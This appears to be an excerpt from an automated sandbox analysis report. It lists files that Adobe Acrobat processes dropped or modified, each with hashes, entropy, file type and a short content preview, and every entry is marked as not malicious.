                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:modified
                                                                                                Size (bytes):475
                                                                                                Entropy (8bit):4.969516568575897
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8squisBdOg2Hdcaq3QYiubInP7E4T3y:Y2sRdsTHdMHs3QYhbG7nby
                                                                                                MD5:822D5387CE66E7E756ED24466104E004
                                                                                                SHA1:8A23FA2AE6E0A8890811DDF0E85A1434516C42F1
                                                                                                SHA-256:7CC44AB77744FEF5DAA1BA9AB9F27AA52736FE3D84D03D38A928D6A7B58C2969
                                                                                                SHA-512:909683BCAC4622762A40972E888BF16B7E8F4C2FAE87C8FCAEFCA8947FF4915F4BE6432CFC6B3D7AE45E041992FECE66EEDA4FBA325416133247F7A2543681AE
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380877353951677","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":137897},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):475
                                                                                                Entropy (8bit):4.969516568575897
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YH/um3RA8squisBdOg2Hdcaq3QYiubInP7E4T3y:Y2sRdsTHdMHs3QYhbG7nby
                                                                                                MD5:822D5387CE66E7E756ED24466104E004
                                                                                                SHA1:8A23FA2AE6E0A8890811DDF0E85A1434516C42F1
                                                                                                SHA-256:7CC44AB77744FEF5DAA1BA9AB9F27AA52736FE3D84D03D38A928D6A7B58C2969
                                                                                                SHA-512:909683BCAC4622762A40972E888BF16B7E8F4C2FAE87C8FCAEFCA8947FF4915F4BE6432CFC6B3D7AE45E041992FECE66EEDA4FBA325416133247F7A2543681AE
                                                                                                Malicious:false
                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380877353951677","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":137897},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4730
                                                                                                Entropy (8bit):5.248715949567578
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7M0ihbZ:etJCV4FiN/jTN/2r8Mta02fEhgO73gog
                                                                                                MD5:FD080413ADB4BFDA3914D51548773CAC
                                                                                                SHA1:9D13DC0453FF5AF1FA480ADE4ACA5893EB84DE9C
                                                                                                SHA-256:DAB968B6BB32D02C73DF000963C7616E8209259CE04F7E7A834F836AFB7F70FC
                                                                                                SHA-512:9AA4704F008EE24AE91E371972C818416FC0306C83E5CEC1936B236981332879A4906C04EA2BC90594BA5E1B584C2C7E9E54C918549D595984FBE4AA8FBC7F6E
                                                                                                Malicious:false
                                                                                                Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):324
                                                                                                Entropy (8bit):5.138061041115395
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:iOsB8lyq2Pwkn2nKuAl9OmbzNMxIFUt24z1ZmwwVRkwOwkn2nKuAl9OmbzNMFLJ:7a8lyvYfHAa8jFUtx/KR5JfHAa84J
                                                                                                MD5:8E4B70B86CE6C64A8378562DBDAB1FBF
                                                                                                SHA1:30D3EEBCAB9F1D03E9302374739C8629451257E1
                                                                                                SHA-256:C13430183FCF23A3DF22ACB4F52E481EA24BE59FC2BC1D19C29919EF1114EEAE
                                                                                                SHA-512:5FE3999FD609D5C0E29C099EB02C949CEE5E564E9BB3D21016ED73B9A8FF4A9CD3159C9647C787A0C0A47B0E285099A5367BABA493CA2E61DB7FE3EBC77CCEE1
                                                                                                Malicious:false
                                                                                                Preview:2025/01/08-01:22:21.868 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/08-01:22:21.893 1e70 Recovering log #3.2025/01/08-01:22:21.902 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):324
                                                                                                Entropy (8bit):5.138061041115395
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:iOsB8lyq2Pwkn2nKuAl9OmbzNMxIFUt24z1ZmwwVRkwOwkn2nKuAl9OmbzNMFLJ:7a8lyvYfHAa8jFUtx/KR5JfHAa84J
                                                                                                MD5:8E4B70B86CE6C64A8378562DBDAB1FBF
                                                                                                SHA1:30D3EEBCAB9F1D03E9302374739C8629451257E1
                                                                                                SHA-256:C13430183FCF23A3DF22ACB4F52E481EA24BE59FC2BC1D19C29919EF1114EEAE
                                                                                                SHA-512:5FE3999FD609D5C0E29C099EB02C949CEE5E564E9BB3D21016ED73B9A8FF4A9CD3159C9647C787A0C0A47B0E285099A5367BABA493CA2E61DB7FE3EBC77CCEE1
                                                                                                Malicious:false
                                                                                                Preview:2025/01/08-01:22:21.868 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/08-01:22:21.893 1e70 Recovering log #3.2025/01/08-01:22:21.902 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                Category:dropped
                                                                                                Size (bytes):71190
                                                                                                Entropy (8bit):2.7227985456465515
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:LwuHHXzXinHLR/x5JVIAPshpSkThGwHXlC7rtiPM+A8zb3LbwXpYfXy2JPwK5wQ5:LwuHHXDin5IAPWpSYFKRiPtAWUs1PwKV
                                                                                                MD5:6E9972134685C780BD5D84C509955766
                                                                                                SHA1:117FD8E3B8BD2DD77D89B224FB061075E08559FB
                                                                                                SHA-256:961E5430D281AFF82FF5EEEFA54F7C6B9946D48CA74647E214CECBCE0B14A879
                                                                                                SHA-512:6A5F0D83FC15C169C361B1ED13231DA6A76B4776C26CC39BF220AD9EEE1E96FB04165C061CD8DA318EC0507B825578E91D30AA1ED5DAEC350A4A02DED325D0C3
                                                                                                Malicious:false
                                                                                                Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                Category:dropped
                                                                                                Size (bytes):86016
                                                                                                Entropy (8bit):4.444879020386821
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:yezci5toiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rPs3OazzU89UTTgUL
                                                                                                MD5:5E1CF35CA6F42CA957C6B1ACDE224E77
                                                                                                SHA1:2AF30A40B6513783835D37D3A17739A23E3AB703
                                                                                                SHA-256:53382600B7BA524579794842EAF580E07587100C0EA0F27EB86B1BE94E53E74C
                                                                                                SHA-512:CBD1A3ED1CFF9DD9A278CDDCF5CCBCF55876152F7DF915B055E48694001FCF89750CC8CD1DCDA65F401CB18203FE27157B61AA6663FAA4AD3B210A9BAF0AC0D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite Rollback Journal
                                                                                                Category:dropped
                                                                                                Size (bytes):8720
                                                                                                Entropy (8bit):3.7747886161836885
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7M4p/E2ioyVsioy9oWoy1Cwoy1AKOioy1noy1AYoy1Wioy1hioybioyeoy1noy1j:7HpjusFbXKQvJb9IVXEBodRBkV
                                                                                                MD5:F626BFEF799C7A4DA4B9193ADF5C582F
                                                                                                SHA1:E49401AE5DCB3D02A918038661F1EE4A0DD92941
                                                                                                SHA-256:96D61CC9557963BA69A702BCC0899C877BAE20D0582E7322F3EFC15F60573212
                                                                                                SHA-512:F2EA411B69BC4E7477413B098E8587118E039FD4857F1837224B9CF0A9B92B824849A00FE36D94B562991DED442F7036B26BE9D2E0E0D2B259BB9C9D3A24E551
                                                                                                Malicious:false
                                                                                                Preview:.... .c.....}.)................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:Certificate, Version=3
                                                                                                Category:dropped
                                                                                                Size (bytes):1391
                                                                                                Entropy (8bit):7.705940075877404
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                Malicious:false
                                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):192
                                                                                                Entropy (8bit):2.746484906506307
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:kkFklmnm+klfllXlE/HT8k9WhttNNX8RolJuRdxLlGB9lQRYwpDdt:kK/nXT80W3NMa8RdWBwRd
                                                                                                MD5:1D2886642CD6B2C42145C1E8FEC71A1D
                                                                                                SHA1:46E0C10D92B9E106E2924A8F45005867EF4A3A1E
                                                                                                SHA-256:B1DB7F45A109F26166CC652A0950141D3E05D344001BCD582048684F040EA522
                                                                                                SHA-512:086D98C8E39DE873604EA2BB7E8CCF87D7AF840F2482D7CFB5DCFACA84C1369F562FE8F60533E728623D0F41B252EF64862888075DF65CCB07A8C16F75ADE9C1
                                                                                                Malicious:false
                                                                                                Preview:p...... .........Ba..a..(....................................................... ..........W....X...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):5.233980037532449
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):5.233980037532449
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):5.233980037532449
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):10880
                                                                                                Entropy (8bit):5.214360287289079
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:PostScript document text
                                                                                                Category:dropped
                                                                                                Size (bytes):10880
                                                                                                Entropy (8bit):5.214360287289079
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                Malicious:false
                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):243196
                                                                                                Entropy (8bit):3.3450692389394283
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                                                                MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                                                                SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                                                                SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                                                                SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                                                                Malicious:false
                                                                                                Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.376970495708661
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJM3g98kUwPeUkwRe9:YvXKXnXlK2Zc0vjgGMbLUkee9
                                                                                                MD5:DF9AEFED12E8732D8B45F1F933A884A6
                                                                                                SHA1:1AFF8A840D82FE33FE220A15A925F6F51786711D
                                                                                                SHA-256:7270E09D61BF6391035232D226EA58B83D100FBBD177AD8F33A1ABC1971C8C26
                                                                                                SHA-512:4493FBA37C1E37D73A384C83CA3DBFE07212F0DFC1790FED7D0398395D4CCFC436F8C7AE2A4C7058002B72715EEE2972CA16F777FDB1C3E33491CABA9711E94C
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.329526095847524
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfBoTfXpnrPeUkwRe9:YvXKXnXlK2Zc0vjgGWTfXcUkee9
                                                                                                MD5:E1B64ABE5DE1933850C18E954F631EBE
                                                                                                SHA1:66AD7963585304DB467DF93E6E6926716E3E0D4C
                                                                                                SHA-256:10CDCE72DE61B3DCF9124884407D62D31AEB338B85AB44794751410C4AE8DE33
                                                                                                SHA-512:55154CA1C41EDC2294A518D505494983E587ED8A62CE7885DC7F72E3E84FFDEB242491FC5748AF4F7459B96A3FE6D018D3E20410AE1497E249876A0A94721C5D
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"37ac1625-58c1-45b1-b746-39b971196eb1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736490823451,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.307785591205331
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXO0X+MTKHVoZcg1vRcR0Y0foAvJfBD2G6UpnrPeUkwRe9:YvXKXnXlK2Zc0vjgGR22cUkee9
                                                                                                MD5:F701A1AD9363E7B1DE6A351C8E91E790
                                                                                                SHA1:5C51BD23F4EA5E796E7107A04021B574EFD046A6
